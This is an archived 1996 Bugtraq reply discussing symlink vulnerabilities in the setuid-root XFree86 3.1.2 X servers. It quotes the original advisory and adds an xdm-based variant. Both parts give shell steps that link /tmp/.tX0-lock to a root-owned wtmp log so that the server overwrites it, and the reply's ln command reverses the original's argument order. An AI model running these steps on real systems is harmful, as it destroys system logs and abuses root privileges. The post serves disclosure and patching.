Bugtraq mailing list archives
Re: XFree86 3.1.2 Security Problems
From: frantic () worldnet net (Anthony C. Zboralski)
Date: Tue, 30 Jan 1996 02:51:40 +0100
-----BEGIN PGP SIGNED MESSAGE----- On Mon, 29 Jan 1996, David J Meltzer wrote:
Date: Mon, 29 Jan 1996 00:16:46 -0500 From: David J Meltzer <davem+ () andrew cmu edu> To: Multiple recipients of list BUGTRAQ <BUGTRAQ () CRIMELAB COM> Subject: XFree86 3.1.2 Security Problems There are security holes in XFree86 3.1.2, which installs its servers as suid root (/usr/X11R6/bin/XF86_*). When reading and writing files, it does not take proper precautions to ensure that file permissions are maintained, resulting in the ability to overwrite files, and to read limited portions of other files. The first problem stems from the server opening a temporary file, /tmp/.tX0-lock with mode (O_WRONLY|O_CREAT|O_TRUNC). By making this file a symlink, the server will overwrite the original file, and then write to it its current pid. Other problems exist in the server relating to similar problems, one such example is the ability to specify an arbitrary file for the XF86config file which will then be opened, and the first line that fails to match the expected format will be output with an error, allowing a line to be read from an arbitrary file. Program: XFree86 3.1.2 servers Affected Operating Systems: All systems with XFree86 3.1.2 installed Requirements: account on system Temporary Patch: chmod o-x /usr/X11R6/bin/XF86* Security Compromise: overwrite arbitrary files Author: Dave M. (davem () cmu edu) Synopsis: While running suid root, XFree86 servers do not properly check file permissions, allowing a user to overwrite arbitrary files on a system. Exploit: $ ls -l /var/adm/wtmp -rw-r--r-- 1 root root 174104 Dec 30 08:31 /var/adm/wtmp $ ln -s /var/adm/wtmp /tmp/.tX0-lock $ startx (At this point exit X if it started, or else ignore any error messages) $ ls -l /var/adm/wtmp -r--r--r-- 1 root root 11 Dec 30 08:33 /var/adm/wtmp
Oh well if xdm is running.. The temporary patch won't do you good... Xdm manages a collection of X displays, which may be on the local host or remote servers. Xdm provides services similar to those provided by init, getty and login on character terminals: prompting for login name and password, authenticating the user, and running a ``session.'' Xdm is launched by root.. by default it will start a server on the local display. If the server crashes for some reason, gets killed or if the user sends a server abort sequence, it will restart the server.. $ps -ax |grep xdm 80 ? S 0:00 xdm 142 ? S 0:01 /usr/X11R6/bin/X -auth /usr/X11R6/lib/X11/xdm/A:0-a00080 179 v03 D 0:00 grep xdm $ls -l /var/log/wtmp - -rw-r--r-- 1 root root 31864 Jan 30 02:13 /var/log/wtmp $ ln -s /tmp/.tX0-lock /var/log/wtmp Now, you switch to the local X display and send the <Crtl><Alt><BS> server abort sequence.. Wait until xdm pops up a new server process.. than switch back to shell: $ls -l /var/log/wtmp - -rw-r--r-- 1 root root 11 Jan 30 02:13 /var/log/wtmp Xdm doesn't need to kill the server when a user logs out so the only worry would be the sending of the abort sequence easily fixed by uncommenting in the "Don'tZap" setting in /etc/XF86Config.. but I have seen XF86 crashing so many times for unguessable reason so i don't think it will fix the prob. Maybe someone could take a look at the server sources so it does a system("/bin/rm /tmp/.tX0-lock") just before it a write to the file.. I don't have 'em handy.. ____ \ /__ Anthony C. Zboralski <frantic () worldnet net> \/ / \/ Finger <frantic () webbar imaginet fr> for PGP Public Key -----BEGIN PGP SIGNATURE----- Version: 2.6.3i Charset: noconv Comment: France, Russia and Irak still forbid encryption.. iQCVAwUBMQ141V/59mQ4I551AQGVEgP/aO3+dCX8FA/2sNOeaE6p33u2+Ed1yuPM 2NyI14L3q1RQ7xt8seHQD1KzWxvRJxbSvWKhrIdhSuisAzlh8QJdn4hZ8ulgPNBf uesUvAbvVJjhhandT0wjVbL0rYRBJEs9NJtWTrrF/gZ+5+cuvnKM2iyeTcAY9EGL 2MvbAtN6yr4= =EwzG -----END PGP SIGNATURE-----
Current thread:
- XFree86 3.1.2 Security Problems David J Meltzer (Jan 28)
- Re: XFree86 3.1.2 Security Problems David Dawes (Jan 28)
- Re: XFree86 3.1.2 Security Problems Anthony C. Zboralski (Jan 29)
- bind() Security Problems Aleph's K-Rad GECOS Field (Jan 30)
- SGI Security Advisory 19960102-01-P, SGI Security Coordinator (Jan 30)
- Aiiiieeee!! *Hobbit* (Jan 30)
- Re: BoS: bind() Security Problems Bernd Lehle (Jan 31)